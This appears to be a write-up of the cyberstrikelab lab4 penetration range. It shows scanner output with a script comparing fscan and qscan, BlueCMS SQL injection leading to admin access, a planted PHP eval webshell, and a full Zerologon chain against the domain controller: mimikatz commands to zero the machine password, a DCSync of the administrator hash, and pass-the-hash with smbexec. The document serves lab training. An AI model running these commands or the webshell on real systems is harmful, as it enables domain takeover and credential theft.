cyberstrikelab-lab4

Information gathering

As usual, start with the fscan scan record, and run qscan (fast) against the same range to compare which of the two gives the more detailed picture.


___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 192.168.10.10 is alive
(icmp) Target 192.168.10.233 is alive
[*] Icmp alive hosts len is: 2
192.168.10.10:135 open
192.168.10.10:139 open
192.168.10.233:22 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.10:3389 open
192.168.10.10:5040 open
192.168.10.10:5820 open
192.168.10.10:7680 open
192.168.10.233:8080 open
192.168.10.233:11333 open
192.168.10.10:49664 open
192.168.10.10:49665 open
192.168.10.10:49667 open
192.168.10.10:49666 open
192.168.10.10:49668 open
192.168.10.10:49669 open
192.168.10.10:49670 open
[*] alive ports len is: 18
start vulscan
[*] WebTitle http://192.168.10.233:11333 code:404 len:19 title:None
[*] WebTitle http://192.168.10.10:5820 code:200 len:9243 title:演示网站 - Powered by BlueCMS
[*] WebTitle https://192.168.10.233:8080 code:404 len:19 title:None
[+] InfoScan http://192.168.10.10:5820 [CMS]
已完成 16/18 [-] (47/210) rdp 192.168.10.10:3389 administrator abc123 remote error: tls: access denied
已完成 16/18 [-] (94/210) rdp 192.168.10.10:3389 admin admin@111 remote error: tls: access denied
已完成 16/18 [-] (141/210) rdp 192.168.10.10:3389 guest 123456 remote error: tls: access denied
已完成 16/18 [-] ssh 192.168.10.233:22 admin 123456789 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 17/18 [-] ssh 192.168.10.233:22 admin qwe123!@# ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 18/18
./qscan_mac_arm64 -t 192.168.10.1/24 -p 1-65535

┏┓┏┏┏┓┏┓
┗┫┛┗┗┻┛┗

Tips: 可以使用--spy 10,将会进行10.0.0.1/8(A段)进行网关存活性探测
[+]2025/03/25 15:46:13 当前环境为:darwin, 输出编码为:utf-8
[+]2025/03/25 15:46:13 成功加载HTTP指纹:[24758]条
[+]2025/03/25 15:46:13 成功加载NMAP探针:[150]个,指纹[11916]条
[+]2025/03/25 15:46:14 Domain、IP、Port、URL、Hydra引擎已准备就绪
netbios://192.168.10.10:139 netbios Port:139,OperatingSystem:Windows,Digest:"\x83\x00\x00\x01\x8f",Length:5,ProductName:osoftWindowsnetbios-ss
smb://192.168.10.10:445 smb Port:445,Digest:"SMB@A*VAC/$@`<+00,0+7+7,Length:518
mysql://192.168.10.10:3306 mysql ProductName:MySQL,Port:3306,Digest:"HjHost'192.168.122.124,Info:unauthorized,DeviceType:cpe:,Length:76
rdp://192.168.10.10:3389 rdp Port:3389,ProductName:crosoftTerminalService,OperatingSystem:Windows,Digest:0e\xd0\x00\x00\x124\x00\,Length:19
ssh://192.168.10.233:22 ssh Version:7.4,Port:22,Digest:"SSH-2.0-OpenSSH_7.4\r\n,Length:21,ProductName:OpenSSH,Info:protocol2.0
[+]2025/03/25 15:46:33 所有扫描任务已下发完毕
http://192.168.10.10:5820 演示网站-PoweredbyBlueCMS FingerPrint:PHP;QQ;Apache;PasswordField;ActiveX;Object;JQuery;Adobe-Flash;Apachehttpd/2.4.39;Apachehttpd;v;(Win64)OpenSSL/1.1.1bmod_fcgid/2.3.9amod_log_rotate/1.02,Port:5820,Digest:"演示网站您好欢迎您的访问登录免费注册设为首页加,Length:9513,FoundDomain:w.w3.org、fpdownload.macr
http://192.168.10.233:8080 Port:8080,Digest:"tanHTTPrequesttoan,Length:76
http://192.168.10.233:11333 Length:176,Port:11333,FingerPrint:cpe:;Go-IPFSjson-rpcorInfluxDBAPI,Digest:"\r\n\r\n404pagenotfo
[+]2025/03/25 15:47:18 程序执行总时长为:[1m4.940741125s]

qscan is clearly faster and attaches a fingerprint description to each service it identifies; fscan is a bit slower but seems to report more ports (here .10's RPC ports 135 and 49664-49670, plus 5040 and 7680, only show up in fscan).
Either way, the web service is the place to start.
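To answer the "which scanner saw more" question precisely rather than by eyeballing, here is an added example (my own code, not part of the original writeup or of either tool) that parses fscan's `ip:port open` lines and qscan's `scheme://ip:port ...` lines and diffs the two port sets. The sample input is copied from the two scan outputs above, with qscan's digest fields trimmed.

```python
import re

# Sample input: lines taken from the fscan and qscan runs above (qscan digests trimmed).
FSCAN_SAMPLE = """\
(icmp) Target 192.168.10.10 is alive
(icmp) Target 192.168.10.233 is alive
192.168.10.10:135 open
192.168.10.10:139 open
192.168.10.233:22 open
192.168.10.10:445 open
192.168.10.10:3306 open
192.168.10.10:3389 open
192.168.10.10:5040 open
192.168.10.10:5820 open
192.168.10.10:7680 open
192.168.10.233:8080 open
192.168.10.233:11333 open
192.168.10.10:49664 open
192.168.10.10:49665 open
192.168.10.10:49667 open
192.168.10.10:49666 open
192.168.10.10:49668 open
192.168.10.10:49669 open
192.168.10.10:49670 open
[*] alive ports len is: 18
[*] WebTitle http://192.168.10.10:5820 code:200 len:9243 title:演示网站 - Powered by BlueCMS
"""

QSCAN_SAMPLE = """\
[+]2025/03/25 15:46:13 成功加载HTTP指纹:[24758]条
netbios://192.168.10.10:139 netbios Port:139,OperatingSystem:Windows
smb://192.168.10.10:445 smb Port:445
mysql://192.168.10.10:3306 mysql ProductName:MySQL,Port:3306,Info:unauthorized
rdp://192.168.10.10:3389 rdp Port:3389,ProductName:crosoftTerminalService,OperatingSystem:Windows
ssh://192.168.10.233:22 ssh Version:7.4,Port:22,ProductName:OpenSSH,Info:protocol2.0
http://192.168.10.10:5820 演示网站-PoweredbyBlueCMS FingerPrint:PHP;Apache;Apachehttpd/2.4.39,Port:5820
http://192.168.10.233:8080 Port:8080,Digest:"tanHTTPrequesttoan,Length:76
http://192.168.10.233:11333 Length:176,Port:11333,FingerPrint:cpe:;Go-IPFSjson-rpcorInfluxDBAPI
[+]2025/03/25 15:47:18 程序执行总时长为:[1m4.940741125s]
"""

# fscan prints one "ip:port open" line per open port; everything else is status text.
FSCAN_OPEN = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5}) open$")
# qscan prints one "scheme://ip:port <fingerprint>" line per identified service.
QSCAN_SVC = re.compile(r"^([a-z]+)://(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})\s")


def parse_fscan(text):
    """Return the set of (ip, port) tuples fscan reported as open."""
    ports = set()
    for line in text.splitlines():
        m = FSCAN_OPEN.match(line.strip())
        if m:
            ports.add((m.group(1), int(m.group(2))))
    return ports


def parse_qscan(text):
    """Return {(ip, port): scheme} for every service line in qscan output."""
    services = {}
    for line in text.splitlines():
        m = QSCAN_SVC.match(line.strip())
        if m:
            services[(m.group(2), int(m.group(3)))] = m.group(1)
    return services


def compare(fscan_ports, qscan_services):
    """Split the union of both results into what each scanner saw exclusively and what both saw."""
    q = set(qscan_services)
    return {
        "both": sorted(fscan_ports & q),
        "fscan_only": sorted(fscan_ports - q),
        "qscan_only": sorted(q - fscan_ports),
    }


if __name__ == "__main__":
    diff = compare(parse_fscan(FSCAN_SAMPLE), parse_qscan(QSCAN_SAMPLE))
    for label, entries in diff.items():
        print(f"{label}: " + ", ".join(f"{ip}:{port}" for ip, port in entries))
```

On the outputs above this yields 8 ports seen by both, 10 seen only by fscan (135, 5040, 7680 and the 4966x RPC range on .10) and none seen only by qscan, which is the difference the paragraph above describes.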

The site runs BlueCMS, so look up its known vulnerabilities: there is a SQL injection that would work here, but I got into the admin panel by reusing the password from the second lab machine.

BlueCMS 1.6 SQL injection + admin-panel getshell

For the exploitation details see https://github.com/DeeLMind/penetration-1/blob/master/0day%20%26%20exp/BLUECMS/blueCMS%20v1.6%20sp1%20ad_js.php%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.txt

Cracking the admin hash obtained through the injection also yields the password admin123456.

Then pick a template file, edit it, and add a backdoor.

Adding the backdoor:

<?php @eval($_POST['a']);?>

Then the flag is right there.

Internal network penetration

Scan the internal network with fscan:

192.168.20.30:445 open
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.30:139 open
192.168.20.20:139 open
192.168.20.10:139 open
192.168.20.30:135 open
192.168.20.20:135 open
192.168.20.10:135 open
192.168.20.10:7680 open
192.168.20.30:88 open
192.168.20.20:7001 open
192.168.20.10:3306 open
[*] NetInfo
[*]192.168.20.20
[->]cyberweb
[->]192.168.20.20
[*] NetBios 192.168.20.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] WebTitle http://192.168.20.20:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan http://192.168.20.20:7001 [weblogic]
[*] NetInfo
[*]192.168.20.20
[->]cyberweb
[->]192.168.20.20
[*] NetBios 192.168.20.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] WebTitle http://192.168.20.10:5820 code:200 len:9243 title:演示网站 - Powered by BlueCMS
[+] InfoScan http://192.168.20.10:5820 [CMS]
[*] WebTitle http://192.168.20.30:47001 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.20.20:47001 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.20.20:5985 code:404 len:315 title:Not Found
[*] WebTitle http://192.168.20.20:7001 code:404 len:1164 title:Error 404--Not Found
[+] InfoScan http://192.168.20.20:7001 [weblogic]
[+] PocScan http://192.168.20.20:7001 poc-yaml-weblogic-cve-2020-14750

The scan flags a WebLogic vulnerability (CVE-2020-14750), but it doesn't seem to be of much use here: it only gets you into the console. Get a beacon into CS first and go after the domain controller, starting with the Zerologon attack used in lab3.

zerologon

The earlier fscan output did not resolve a hostname for .30, so look it up by hand (ping -a does a reverse lookup):

ping -a 192.168.20.30

shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /account:WIN-7NRTJO59O7N$" "exit"

mimikatz reports the DC as vulnerable, so set the machine account password to empty:

shell mimikatz.exe "lsadump::zerologon /target:192.168.20.30 /ntlm /null /account:WIN-7NRTJO59O7N$ /exploit" "exit"

That succeeded; now DCSync the domain administrator's hash, authenticating as the machine account with the now-empty password:

shell mimikatz.exe "lsadump::dcsync /csv /domain:cyberstrikelab.com /dc:WIN-7NRTJO59O7N.cyberstrikelab.com /user:administrator /authuser:WIN-7NRTJO59O7N$ /authpassword:\"\" /authntlm" "exit"

Then just pass the hash.

proxychains4 python3 smbexec.py -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/administrator@192.168.20.30


proxychains4 python3 smbexec.py -hashes :00f995cbe63fd30411f44d434b8dac98 cyberstrikelab.com/administrator@192.168.20.20
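To show why the zero-credential check and the /exploit step above work at all, here is an added example (my own code, not mimikatz's and not part of the original writeup) that implements the MS-NRPC ComputeNetlogonCredential primitive, AES-128 in CFB8 mode with a fixed all-zero IV, in plain Python and counts, over constructed sample session keys, how often an all-zero client challenge produces an all-zero credential. The sample keys are derived from a fixed string purely so the run is reproducible; on a real DC the session key depends on the machine account secret and a fresh server challenge, which is why the exploit simply retries.

```python
import hashlib

# Pure-Python AES-128 encryption (educational, not constant-time) so this runs offline
# without a third-party crypto library; CFB8 only ever needs the encrypt direction.

def _xt(a):
    """Multiply by x in GF(2^8) modulo the AES polynomial."""
    return ((a << 1) ^ 0x1b) & 0xff if a & 0x80 else a << 1


def _build_sbox():
    """Rijndael S-box from the p*q == 1 walk over the field plus the affine map."""
    s, p, q = [0] * 256, 1, 1
    rot = lambda x, n: ((x << n) & 0xff) | (x >> (8 - n))
    while True:
        p = (p ^ (p << 1) ^ (0x1b if p & 0x80 else 0)) & 0xff  # p *= 3
        q = (q ^ (q << 1)) & 0xff                               # q /= 3
        q = (q ^ (q << 2)) & 0xff
        q = (q ^ (q << 4)) & 0xff
        if q & 0x80:
            q ^= 0x09
        s[p] = q ^ rot(q, 1) ^ rot(q, 2) ^ rot(q, 3) ^ rot(q, 4) ^ 0x63
        if p == 1:
            break
    s[0] = 0x63
    return s


SBOX = _build_sbox()
XT = [_xt(i) for i in range(256)]


def _expand_key(key):
    """AES-128 key schedule: 11 round keys of 16 bytes in column-major state order."""
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = list(w[i - 1])
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord then SubWord
            t[0] ^= rcon
            rcon = _xt(rcon)
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]


def _encrypt_block(rks, block):
    s = [b ^ k for b, k in zip(block, rks[0])]
    for rnd in range(1, 11):
        s = [SBOX[b] for b in s]                                             # SubBytes
        s = [s[4 * ((c + r) % 4) + r] for c in range(4) for r in range(4)]  # ShiftRows
        if rnd != 10:                                                        # MixColumns
            m = []
            for c in range(4):
                a = s[4 * c:4 * c + 4]
                t = a[0] ^ a[1] ^ a[2] ^ a[3]
                m += [a[i] ^ t ^ XT[a[i] ^ a[(i + 1) % 4]] for i in range(4)]
            s = m
        s = [b ^ k for b, k in zip(s, rks[rnd])]                             # AddRoundKey
    return bytes(s)


def aes_encrypt_block(key, block):
    return _encrypt_block(_expand_key(key), block)


def aes_cfb8_encrypt(key, iv, data):
    """CFB8: each byte is XORed with the first byte of E(shift register); the register
    then shifts left by one byte and takes the ciphertext byte in."""
    rks = _expand_key(key)
    shift, out = bytearray(iv), bytearray()
    for b in data:
        c = _encrypt_block(rks, bytes(shift))[0] ^ b
        out.append(c)
        shift = shift[1:] + bytes([c])
    return bytes(out)


def netlogon_credential(session_key, challenge):
    """MS-NRPC ComputeNetlogonCredential, AES flavour: AES-128-CFB8 with an all-zero IV
    over the 8-byte challenge. The fixed zero IV is the root cause of CVE-2020-1472."""
    return aes_cfb8_encrypt(session_key, bytes(16), challenge)


def sample_session_key(i):
    """Constructed sample key; a real session key derives from the machine account secret."""
    return hashlib.sha256(b"sample-session-key" + i.to_bytes(4, "big")).digest()[:16]


def zero_credential_keys(trials=2048):
    """Indexes of sample keys for which the all-zero ClientChallenge gives an all-zero
    ClientCredential, i.e. keys for which the server would accept eight zero bytes."""
    return [i for i in range(trials)
            if netlogon_credential(sample_session_key(i), bytes(8)) == bytes(8)]


if __name__ == "__main__":
    hits = zero_credential_keys()
    print(f"{len(hits)}/2048 sample keys accept the zero credential (about 1 in 256 expected)")
```

Roughly 1 in 256 keys accept the zero credential because CFB8 with a zero IV and zero input depends only on the first byte of AES(key, 0^16): once that byte is zero the shift register stays all-zero and every later keystream byte is zero too. That is the whole bug. An attacker who sends a zero ClientChallenge and zero ClientCredential, and leaves the sign/seal flag out of the negotiated flags, just repeats NetrServerAuthenticate3 until the DC happens to derive such a key, which is what the check and /exploit steps above do before calling NetrServerPasswordSet2 with an empty password. Remember that zeroing the password breaks the DC's own secure channel, so restore the original machine-account password once the hash dump is done (the commonly used public exploit scripts include a restore step for this).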